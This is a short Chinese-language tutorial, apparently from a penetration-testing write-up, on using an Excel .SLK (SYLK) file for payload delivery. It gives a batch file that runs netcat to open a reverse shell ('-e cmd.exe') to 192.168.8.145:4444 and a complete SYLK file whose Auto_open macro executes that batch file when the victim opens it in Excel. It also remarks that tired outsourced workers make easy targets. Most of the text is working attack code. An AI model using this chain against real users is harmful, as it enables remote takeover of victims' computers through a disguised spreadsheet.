Excel .SLK文件
该方法是通过编写.slk后缀文件执行命令来达到Payload交付的目的。
首先创建一个批处理程序文件nc.cmd:
C:\Users\Administrator\Desktop\nc.exe 192.168.8.145 4444 -e cmd.exe
然后编辑一个.slk文件:
ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("C:\Users\Administrator\Desktop\nc.cmd")
C;X1;Y102;K0;EHALT()
E
保存后,使用Excel打开该文件即可获取到一个Shell会话:
该文件实际上是纯文本文件,所以很容易被检测。
(样式跟Excel有差距,普通人可能骗不到,但是熬夜的打工外包刚刚好)